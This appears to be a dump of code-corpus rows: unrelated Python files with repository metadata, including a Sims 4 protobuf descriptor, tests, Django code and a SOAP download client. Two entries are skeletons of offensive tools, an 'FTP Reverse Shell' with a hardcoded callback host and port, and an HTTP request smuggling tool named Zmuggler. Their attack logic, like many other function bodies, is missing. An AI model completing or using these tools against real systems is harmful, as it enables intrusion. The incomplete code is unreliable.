full_name='EA.Sims4.Network.SocialCandidatesMessage.count',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='platform_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='category_restriction',
full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialCandidatesMessage.digest',
index=4,
number=5,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates',
index=5,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='expire_epoch_secs',
full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6217,
serialized_end=6453)
_SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='winner_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='loser_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids',
index=1,
number=2,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6455,
serialized_end=6542)
_SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage',
full_name='EA.Sims4.Network.SocialCGDigestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6544,
serialized_end=6660)
_SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS
_SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST
_SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO
_SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN
_SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE
_SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA
_SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE
_SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
_SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG
_SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST
_SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG
_SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST
_SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
_SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE
_SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE
_SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
_SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG
DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG
DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE
DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST
DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG
DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE
DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE
DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST
DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE
DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE
DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE
DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG
DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE
DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
| 31.050625 | 10,693 | 0.763723 |
5f9ec6c74b57542c9787a229e40967ba3e06098c | 56 | py | Python | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | __all__ = ["NumpyUtility"]
from .NumpyUtility import *
| 14 | 27 | 0.732143 |
5f9f9ecefb3439db4ca570e4a61b0846cf1331d6 | 188 | py | Python | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | 1 | 2021-01-10T12:06:26.000Z | 2021-01-10T12:06:26.000Z | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | import sweetviz
import pandas as pd
if __name__ == '__main__':
df = pd.read_csv("BankChurners_clean.csv")
report = sweetviz.analyze(df, "Attrition_Flag")
report.show_html()
| 20.888889 | 51 | 0.707447 |
5fa0436f9f5d626cf4b365a484376d1f5343ee15 | 5,046 | py | Python | FTPShell/FTPShell.py | dsogo/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 17 | 2020-10-07T01:37:32.000Z | 2021-12-11T21:23:25.000Z | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | null | null | null | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 8 | 2020-09-22T03:14:51.000Z | 2022-03-07T16:03:24.000Z | from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED WITH EXTERN NETWORK
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'# YOUR IP OR HOST
port = 443
if __name__ == '__main__':
socketConn(ftp)
| 35.535211 | 92 | 0.441538 |
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693 | 8,321 | py | Python | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 13 | 2020-02-19T02:09:00.000Z | 2021-12-16T23:15:58.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 33 | 2020-02-12T11:21:51.000Z | 2022-02-10T00:48:17.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Cte i-r
dIvoire]. i-r
Bulletin i-r
de i-r
la i-r
Socit i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Côte
d'Ivoire].
Bulletin
de
la
Société
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
Text of TEST_TSV_TRAIN:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Côte i-r a
d'Ivoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Société i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
| 24.259475 | 88 | 0.414373 |
5fa141b264762a22f9a2b6309a86900f4d79fb07 | 389 | py | Python | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 21 | 2019-04-15T07:25:48.000Z | 2022-03-19T04:21:43.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 30 | 2019-04-15T07:18:59.000Z | 2022-03-19T07:26:57.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 16 | 2019-02-21T11:59:32.000Z | 2022-02-23T17:33:16.000Z | import json
import responses
| 24.3125 | 93 | 0.59383 |
5fa14c2eb69ff76b5ae4ab590ca445b49132d179 | 37,185 | py | Python | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 21 | 2020-06-03T13:54:22.000Z | 2022-02-27T18:20:35.000Z | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 79 | 2020-07-30T17:29:04.000Z | 2022-03-09T00:06:39.000Z | prescient/gosm/tester.py | bknueven/Prescient | 6289c06a5ea06c137cf1321603a15e0c96ddfb85 | [
"BSD-3-Clause"
] | 16 | 2020-07-14T17:05:56.000Z | 2022-02-17T17:51:13.000Z | # ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
def initialize(dim=2,precision = None,copula_string='independence-copula'):
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
# For some tests, gaussian and student are less precised so we change so precision asked :
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
i=+1
print(i)
| 43.644366 | 134 | 0.61584 |
5fa27ee2e5dad2743d90292ecca26ad61a23a586 | 615 | py | Python | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | 1 | 2020-07-31T06:34:27.000Z | 2020-07-31T06:34:27.000Z | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | from django.contrib import admin
from inbound.models import Rule, InboundIP
# Register your models here.
admin.site.register(Rule, RuleAdmin)
| 25.625 | 98 | 0.676423 |
5fa29ec1b9e32e73683aab09293ca2018836774b | 397 | py | Python | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | 2 | 2020-12-11T12:45:34.000Z | 2021-11-09T11:25:23.000Z | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | from django import forms
| 49.625 | 89 | 0.722922 |
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d | 751 | py | Python | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | 1 | 2021-01-03T13:01:33.000Z | 2021-01-03T13:01:33.000Z | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | from collections import Counter
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2")) | 31.291667 | 77 | 0.609854 |
5fa6b75aa0e33eeec7402b44584c8450dcb054c7 | 1,226 | py | Python | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | #!/bin/env python
# Copyright STIFTELSEN SINTEF 2016
import suds
import urllib2
import sys
if len(sys.argv) < 4:
print ("Usage:")
print ("\t %s gss-url outputfilename token" % sys.argv[0])
exit()
# get url:
url = sys.argv[1]
outputfileName = sys.argv[2]
sessionToken = sys.argv[3]
wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl"
client = suds.client.Client(wsdlLocation)
resourceInformation = client.service.getResourceInformation(url, sessionToken)
readDescription = resourceInformation.readDescription
if readDescription.supported:
headers = {}
headers[readDescription.sessionTokenField] = sessionToken
if hasattr(readDescription, "headers"):
for headerField in readDescription.headers:
headers[headerField.key] = headerField.value
with open(outputfileName, "wb") as outputFile:
request = urllib2.Request(url = readDescription.url, headers=headers)
result = urllib2.urlopen(request)
while True:
buffer = result.read()
if not buffer:
break
outputFile.write(buffer)
else:
print "The given gss_url does not support read/download."
| 29.190476 | 88 | 0.686786 |
5faad04658ea51684534a077173c5f03481fc86f | 6,728 | py | Python | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | 1 | 2021-07-28T06:02:44.000Z | 2021-07-28T06:02:44.000Z | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
http.client._header_name = lambda x: True
http.client._header_value = lambda x: False
urllib3.disable_warnings()
if __name__ == '__main__':
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
| 35.597884 | 148 | 0.5 |
